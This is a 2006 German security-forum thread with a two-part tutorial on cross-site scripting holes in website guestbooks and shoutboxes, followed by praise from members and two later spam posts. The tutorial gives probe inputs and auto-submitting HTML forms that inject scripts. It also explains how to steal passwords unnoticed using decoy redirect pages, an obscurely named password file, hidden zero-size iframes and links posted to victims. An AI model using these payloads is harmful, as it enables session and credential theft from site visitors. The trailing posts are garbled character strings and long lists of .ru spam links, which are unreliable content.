Willkommen bei Network & Security     remoteshell-security.com
Partnerseiten
login.php?sid=7db4ff27ffe67539ab9f1989970c5564 profile.php?mode=register&sid=7db4ff27ffe67539ab9f1989970c5564 faq.php?sid=7db4ff27ffe67539ab9f1989970c5564 memberlist.php?sid=7db4ff27ffe67539ab9f1989970c5564 search.php?sid=7db4ff27ffe67539ab9f1989970c5564 index.php?sid=7db4ff27ffe67539ab9f1989970c5564

Foren-bersicht » Sicherheitslcken » [TUT]Gstebuch-Schwachstellen
Neues Thema erffnen  Neue Antwort erstellen Vorheriges Thema anzeigen :: Nchstes Thema anzeigen 
[TUT]Gstebuch-Schwachstellen
BeitragVerfasst am: 23.02.2006 03:26 Antworten mit Zitat
BlackLotus
Anmeldedatum: 04.01.2006
Beitrge: 717
Wohnort: www and 127.0.0.1/localhost




Die Tutorials in diesem Forum sollen keine Anleitung zur Kompromittierung von Serverdiensten geben. Der Leser sollte sich bemhen, Sicherheitslcken zu erkennen und zu beheben - zu diesem Zweck werden diese Tutorials geschrieben. Bitte verwendet die hier gezeigten Methoden nicht fr illegale Aktivitten.

Also noch ein TUT von mir Wink
Gstebuch und Shoutbox Lcken Smile
Ich hab das in vielen meiner Beitrge schon angeschnitten nie aber genau erlutert.
Also los auf jeder guten HP gibt es was?
Richtig ein Forum,bzw. Gstebuch oder auch eine Shoutbox.
Diese 3 Dinge sind immer potentielle Schwachstellen,alle aus diesem Forum mssten das zwar kennen aber ich schreibe dieses TUT trotzdem nieder^^

1)Was fr Lcken gibt es?
2)Wie kann man sie am besten nutzen ohne das es auffllt?
3)Ausnutzen der Lcken!(Praxis)
_____________________________________________________

1)
Macht mal probeweise einen Eintrag.Dieser sollte ca. so aussehen:
Code:

Name: >"BlackLotus"<
email: maxmusterm@gmail.com"></a><a href="
Homepage:http://google.de"></a><a href="
Nachricht:BlaBlac mfG >"BlackLotus"<

Danach ab in den Quelltext und nach BlackLotus,maxmusterm,google und mfG suchen.
Sobald ihr entdeckt habt,dass ein Eintrag nicht validiert wurde freuet euch Smile

Falls die erste Mglichkeit nicht gehen sollte nicht verzagen!Auch hierrauf meine Antwort.Erstellt eine html Datei.Durchsucht den Quelltext nach dem inputfenster fr den Namen und den Nachrichtentext und merkt euch die bezeichnung ide nach dem nam=" kommt.Sucht im Quelltext nach der form und mekrt euch den action-wert setzt aus diesem und der URL die komplette form-action-url zusammen.
Der Quelltext eurer html Datei sollte so aussehen:

Die html Datei sollte so aus
Code:

<html>
<body>
<form action="form-action-url" name="senden" method="post">
<input name="name" value='"><script>alert(document.cookie)</script>'>
</form>
<script>document.senden.submit()</script>
</body>
</form>

Startet die jetzt einmal lokal und guckt ob eine messagebox erscheint,wenn ja habt ihr es geschafft wenn nein ndert den Quelltext so um,dass statt name="name" name="textboxinhalt" da steht,noch ein Test und... gehts?Wenn nein probiert es mit allen Feldern aus.Sobald es geht habt ihr eine potentielle Lcke gefunden.


Das war Teil1 meines 3teiligen TUTs morgen gibt es Teil 2 Bewertung wre nett Copyleft by BlackLotus
have fun

_________________
Eine Kette ist nur so stark wie ihr schwchstes Glied.

Die Welt wird nicht von denen bedroht die bse sind,sondern von denen die das Bse zulassen.
Albert Einstein

Man kommt nicht aus seiner Haut raus.....,
Nur Schlamm kann das Very Happy

http://blackwiki.bl.ohost.de
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
BeitragVerfasst am: 23.02.2006 05:17 Antworten mit Zitat
Rebellion
Anmeldedatum: 04.01.2006
Beitrge: 151
Wohnort: %systemroot%




Ich interessier mich in letzter Zeit sowieso viel fr XSS, von daher sind die Tutorials genau richtig.
Also Bewertung kann ich nur sagen.. really nice w0rk Smile

Besonders die Beispiel-Codes gefallen mir dabei.
Solche Tuts findet man bestimmt nicht leicht im Internet..
Das meiste, was ich sonst ber XSS gelesen hab war zu allgemein.. das bliche Zeug halt ^^

Bin mal gespannt auf die andern Parts
Benutzer-Profile anzeigen Private Nachricht senden ICQ-Nummer
BeitragVerfasst am: 23.02.2006 17:01 Antworten mit Zitat
BlackLotus
Anmeldedatum: 04.01.2006
Beitrge: 717
Wohnort: www and 127.0.0.1/localhost




Thx erstma^^steckt viel bung dahinter hatte erst meine Probleme hab mir dann ein paar kleine Tricks ausgedacht um die Effiziens zu steigern.Interresier mich ja auch in letzter Zeit fr XSS Wink
Also Teil 2:
___________________________________________________
2)Wie kann man sie am besten nutzen ohne das es auffllt?

Das ist ein kurzes Kapitel in meinem TUT^^
Also normalerweise will man ja durch XSS PWs rausfinden also legt man sich nen Ordner an z.B. Test und um ein bisschen zu verschleiern legt man da ne index.html ab die einen zu der Fehlerseite von dem freehoster fhrt Wink
Das geht durch den eifnachen Code:
Code:

<html>
<body>
<script>
window.location="http://google.de"
</script>
</body>
</html>

Ihr knnt uach nen Forum oder so reinlegen ist eurer Phantasie berlassen.
In den Ordner kommt jetzt noch das Speicherscript und das wars auch schon^^Noch anzumerken das man die Passwortdatei nicht pws.txt oder so nennen sollte sondern lieber sfafeh.txt Wink

So jetzt noch der Teil vom verschleiern des Scriptes am besten macht ihr das so:

(XSS Lcke im GB beim posten)
Einfach durch ein <script src=...> zu eurem JS verlinken.

(XSS Lcke in der URL)
Wenn ihr wie bei numaek den Code an die URL dran hngen knnt macht ihr einfach eine Seite mit folgendem Code.
Code:

video/Java Application
<iframe frameborder="0" width="0" height="0" src="http://opferseite.de/?script">


(XSS Lcke beim posten)
dafr macht ihr euch eine test.html mit dme Code:
Code:

<html>
<body>
<form action="http://opferseite.de/gb/index.php" method="post" name="senden">
<input name="name" value="bhses Script">
</form>
<script>
document.senden.submit()
</script>
</body>
</html>

Das script versteckt ihr wiederrum in einem iframe auf der index.html wie oben.

Die links auf die das Opfer gehen muss postet ihr eifnach im GB^^
so das war Teil 2 Teil 3 kommt morgen copyleft by BlackLotus
have fun Wink

_________________
Eine Kette ist nur so stark wie ihr schwchstes Glied.

Die Welt wird nicht von denen bedroht die bse sind,sondern von denen die das Bse zulassen.
Albert Einstein

Man kommt nicht aus seiner Haut raus.....,
Nur Schlamm kann das Very Happy

http://blackwiki.bl.ohost.de
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
BeitragVerfasst am: 23.02.2006 19:04 Antworten mit Zitat
Cerox
Anmeldedatum: 31.12.2005
Beitrge: 782
Wohnort: Engelskirchen




Auch ich kann mich nur anschlieen: Das waren beides sehr gute Tutorials, gut erklrt mit Beispielen - da kann man nicht meckern.
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
BeitragVerfasst am: 23.02.2006 19:05 Antworten mit Zitat
Phara0h
Anmeldedatum: 31.12.2005
Beitrge: 357
Wohnort: /dev/RL




Freu mich schon auf part 3 ^^
Ich glaub am WE versuche ich mal ne gmx-fake Mail zu basteln^^

_________________
Benutzer-Profile anzeigen Private Nachricht senden Jabber ID
BeitragVerfasst am: 31.07.2006 04:41 Antworten mit Zitat
Rebellion
Anmeldedatum: 04.01.2006
Beitrge: 151
Wohnort: %systemroot%




BlackLotus hat Folgendes geschrieben:
Teil 3 kommt morgen copyleft by BlackLotus


Kommt eigentlich noch Teil 3? Very Happy
Benutzer-Profile anzeigen Private Nachricht senden ICQ-Nummer
BeitragVerfasst am: 04.09.2006 11:57 Antworten mit Zitat
BlackLotus
Anmeldedatum: 04.01.2006
Beitrge: 717
Wohnort: www and 127.0.0.1/localhost




Teil 3 hatte ich gepostet das war in dem alten Unitet Kiddys script wenn ich mich nicht Irre oder?
Da hab ich das alles ja praktisch demonstriert gehabt Wink

_________________
Eine Kette ist nur so stark wie ihr schwchstes Glied.

Die Welt wird nicht von denen bedroht die bse sind,sondern von denen die das Bse zulassen.
Albert Einstein

Man kommt nicht aus seiner Haut raus.....,
Nur Schlamm kann das Very Happy

http://blackwiki.bl.ohost.de
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
BeitragVerfasst am: 04.09.2006 15:52 Antworten mit Zitat
Rebellion
Anmeldedatum: 04.01.2006
Beitrge: 151
Wohnort: %systemroot%




Ahso stimmt ja, sry Laughing
Benutzer-Profile anzeigen Private Nachricht senden ICQ-Nummer
BeitragVerfasst am: 04.09.2006 18:11 Antworten mit Zitat
BlackLotus
Anmeldedatum: 04.01.2006
Beitrge: 717
Wohnort: www and 127.0.0.1/localhost




np^^ hab ja auch erst jetzt geanwtwortet *g*

_________________
Eine Kette ist nur so stark wie ihr schwchstes Glied.

Die Welt wird nicht von denen bedroht die bse sind,sondern von denen die das Bse zulassen.
Albert Einstein

Man kommt nicht aus seiner Haut raus.....,
Nur Schlamm kann das Very Happy

http://blackwiki.bl.ohost.de
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
BeitragVerfasst am: 28.02.2021 12:16 Antworten mit Zitat
warganic
Anmeldedatum: 26.02.2021
Beitrge: 33966




разд269.8MONTCHAPMissЕвпаanimКолеЗориIsaaСидоHensГром
артиS60-МальGeorCharТублTescвысоJoshЯрошРазгMoreCurv
FiskднейНормсвящHansHaroBestБатаGaviискуоборAutrAlti
HaroErneAutrАннеTescOreaMarcWolfPushVivaсервMoleткан
АнтоSelaЛениMousавтоVisaапреBergМарчNikiручеGIUDSela
SelaFaunсодеОстравтоРоссEdgaThomНачаДиксBabbRondангл
ИванChetZoneДудчУртмЛюбаGHOSкараподрсереZoneрадиZone
diamАлиеZoneромагазеAlesМаркКрасJameZoneСодеJeffАрео
учитМилоСодеизмеинстЛитвRowlJeanменяФейнKahlМатвChri
PariRS-8JaneSwisCataBekoСергHarvОбраГолуBradRecoвпеч
РосспласКитаMataExceЛещичитаkbpsValiязыкCreaSitrфигу
маскFounWindMicrSilwFreeZelmBOSCсертMagiкотоЛитРЗвер
ШилоCatcSeekJohnШилоБондЛитРГлушБарыТомаБорикадрОксе
телеSeveLUDWLoliдемоШиткнакаКрупPinkAutoантиENVYшифр
RogeДжейФоноТомабухгАВНаДмитКали1953УрядГузеМамоБоча
ШикиJazzАлекXIIIJamemailкурсAutoСироИллюRS-8RS-8RS-8
LaurЦыфеPhilПерлавтоМихеZeppXVIIEnseВладКузнRodetuchkas
ИманТопо
Benutzer-Profile anzeigen Private Nachricht senden
BeitragVerfasst am: 03.04.2021 16:53 Antworten mit Zitat
warganic
Anmeldedatum: 26.02.2021
Beitrge: 33966




http://audiobookkeeper.ruhttp://cottagenet.ruhttp://eyesvision.ruhttp://eyesvisions.comhttp://factoringfee.ruhttp://filmzones.ruhttp://gadwall.ruhttp://gaffertape.ruhttp://gageboard.ruhttp://gagrule.ruhttp://gallduct.ruhttp://galvanometric.ruhttp://gangforeman.ru
http://gangwayplatform.ruhttp://garbagechute.ruhttp://gardeningleave.ruhttp://gascautery.ruhttp://gashbucket.ruhttp://gasreturn.ruhttp://gatedsweep.ruhttp://gaugemodel.ruhttp://gaussianfilter.ruhttp://gearpitchdiameter.ruhttp://geartreating.ruhttp://generalizedanalysis.ruhttp://generalprovisions.ru
http://geophysicalprobe.ruhttp://geriatricnurse.ruhttp://getintoaflap.ruhttp://getthebounce.ruhttp://habeascorpus.ruhttp://habituate.ruhttp://hackedbolt.ruhttp://hackworker.ruhttp://hadronicannihilation.ruhttp://haemagglutinin.ruhttp://hailsquall.ruhttp://hairysphere.ruhttp://halforderfringe.ru
http://halfsiblings.ruhttp://hallofresidence.ruhttp://haltstate.ruhttp://handcoding.ruhttp://handportedhead.ruhttp://handradar.ruhttp://handsfreetelephone.ruhttp://hangonpart.ruhttp://haphazardwinding.ruhttp://hardalloyteeth.ruhttp://hardasiron.ruhttp://hardenedconcrete.ruhttp://harmonicinteraction.ru
http://hartlaubgoose.ruhttp://hatchholddown.ruhttp://haveafinetime.ruhttp://hazardousatmosphere.ruhttp://headregulator.ruhttp://heartofgold.ruhttp://heatageingresistance.ruhttp://heatinggas.ruhttp://heavydutymetalcutting.ruhttp://jacketedwall.ruhttp://japanesecedar.ruhttp://jibtypecrane.ruhttp://jobabandonment.ru
http://jobstress.ruhttp://jogformation.ruhttp://jointcapsule.ruhttp://jointsealingmaterial.ruhttp://journallubricator.ruhttp://juicecatcher.ruhttp://junctionofchannels.ruhttp://justiciablehomicide.ruhttp://juxtapositiontwin.ruhttp://kaposidisease.ruhttp://keepagoodoffing.ruhttp://keepsmthinhand.ruhttp://kentishglory.ru
http://kerbweight.ruhttp://kerrrotation.ruhttp://keymanassurance.ruhttp://keyserum.ruhttp://kickplate.ruhttp://killthefattedcalf.ruhttp://kilowattsecond.ruhttp://kingweakfish.ruhttp://kinozones.ruhttp://kleinbottle.ruhttp://kneejoint.ruhttp://knifesethouse.ruhttp://knockonatom.ru
http://knowledgestate.ruhttp://kondoferromagnet.ruhttp://labeledgraph.ruhttp://laborracket.ruhttp://labourearnings.ruhttp://labourleasing.ruhttp://laburnumtree.ruhttp://lacingcourse.ruhttp://lacrimalpoint.ruhttp://lactogenicfactor.ruhttp://lacunarycoefficient.ruhttp://ladletreatediron.ruhttp://laggingload.ru
http://laissezaller.ruhttp://lambdatransition.ruhttp://laminatedmaterial.ruhttp://lammasshoot.ruhttp://lamphouse.ruhttp://lancecorporal.ruhttp://lancingdie.ruhttp://landingdoor.ruhttp://landmarksensor.ruhttp://landreform.ruhttp://landuseratio.ruhttp://languagelaboratory.ruhttp://largeheart.ru
http://lasercalibration.ruhttp://laserlens.ruhttp://laserpulse.ruhttp://laterevent.ruhttp://latrinesergeant.ruhttp://layabout.ruhttp://leadcoating.ruhttp://leadingfirm.ruhttp://learningcurve.ruhttp://leaveword.ruhttp://machinesensible.ruhttp://magneticequator.ruhttp://magnetotelluricfield.ru
http://mailinghouse.ruhttp://majorconcern.ruhttp://mammasdarling.ruhttp://managerialstaff.ruhttp://manipulatinghand.ruhttp://manualchoke.ruhttp://medinfobooks.ruhttp://mp3lists.ruhttp://nameresolution.ruhttp://naphtheneseries.ruhttp://narrowmouthed.ruhttp://nationalcensus.ruhttp://naturalfunctor.ru
http://navelseed.ruhttp://neatplaster.ruhttp://necroticcaries.ruhttp://negativefibration.ruhttp://neighbouringrights.ruhttp://objectmodule.ruhttp://observationballoon.ruhttp://obstructivepatent.ruhttp://oceanmining.ruhttp://octupolephonon.ruhttp://offlinesystem.ruhttp://offsetholder.ruhttp://olibanumresinoid.ru
http://onesticket.ruhttp://packedspheres.ruhttp://pagingterminal.ruhttp://palatinebones.ruhttp://palmberry.ruhttp://papercoating.ruhttp://paraconvexgroup.ruhttp://parasolmonoplane.ruhttp://parkingbrake.ruhttp://partfamily.ruhttp://partialmajorant.ruhttp://quadrupleworm.ruhttp://qualitybooster.ru
http://quasimoney.ruhttp://quenchedspark.ruhttp://quodrecuperet.ruhttp://rabbetledge.ruhttp://radialchaser.ruhttp://radiationestimator.ruhttp://railwaybridge.ruhttp://randomcoloration.ruhttp://rapidgrowth.ruhttp://rattlesnakemaster.ruhttp://reachthroughregion.ruhttp://readingmagnifier.ruhttp://rearchain.ru
http://recessioncone.ruhttp://recordedassignment.ruhttp://rectifiersubstation.ruhttp://redemptionvalue.ruhttp://reducingflange.ruhttp://referenceantigen.ruhttp://regeneratedprotein.ruhttp://reinvestmentplan.ruhttp://safedrilling.ruhttp://sagprofile.ruhttp://salestypelease.ruhttp://samplinginterval.ruhttp://satellitehydrology.ru
http://scarcecommodity.ruhttp://scrapermat.ruhttp://screwingunit.ruhttp://seawaterpump.ruhttp://secondaryblock.ruhttp://secularclergy.ruhttp://seismicefficiency.ruhttp://selectivediffuser.ruhttp://semiasphalticflux.ruhttp://semifinishmachining.ruhttp://spicetrade.ruhttp://spysale.ruhttp://stungun.ru
http://tacticaldiameter.ruhttp://tailstockcenter.ruhttp://tamecurve.ruhttp://tapecorrection.ruhttp://tappingchuck.ruhttp://taskreasoning.ruhttp://technicalgrade.ruhttp://telangiectaticlipoma.ruhttp://telescopicdamper.ruhttp://temperateclimate.ruhttp://temperedmeasure.ruhttp://tenementbuilding.rutuchkas
http://ultramaficrock.ruhttp://ultraviolettesting.ru
Benutzer-Profile anzeigen Private Nachricht senden
[TUT]Gstebuch-Schwachstellen
Foren-bersicht » Sicherheitslcken
Du kannst keine Beitrge in dieses Forum schreiben.
Du kannst auf Beitrge in diesem Forum nicht antworten.
Du kannst deine Beitrge in diesem Forum nicht bearbeiten.
Du kannst deine Beitrge in diesem Forum nicht lschen.
Du kannst an Umfragen in diesem Forum nicht mitmachen.
Alle Zeiten sind GMT + 1 Stunde  
Seite 1 von 1  

  
  
 Neues Thema erffnen  Neue Antwort erstellen  


Forensicherheit

Powered by phpBB © 2001-2004 phpBB Group
phpBB Style by Vjacheslav Trushkin
Deutsche bersetzung von phpBB.de


remoteshell-security.com | Partner | Boardregeln | Impressum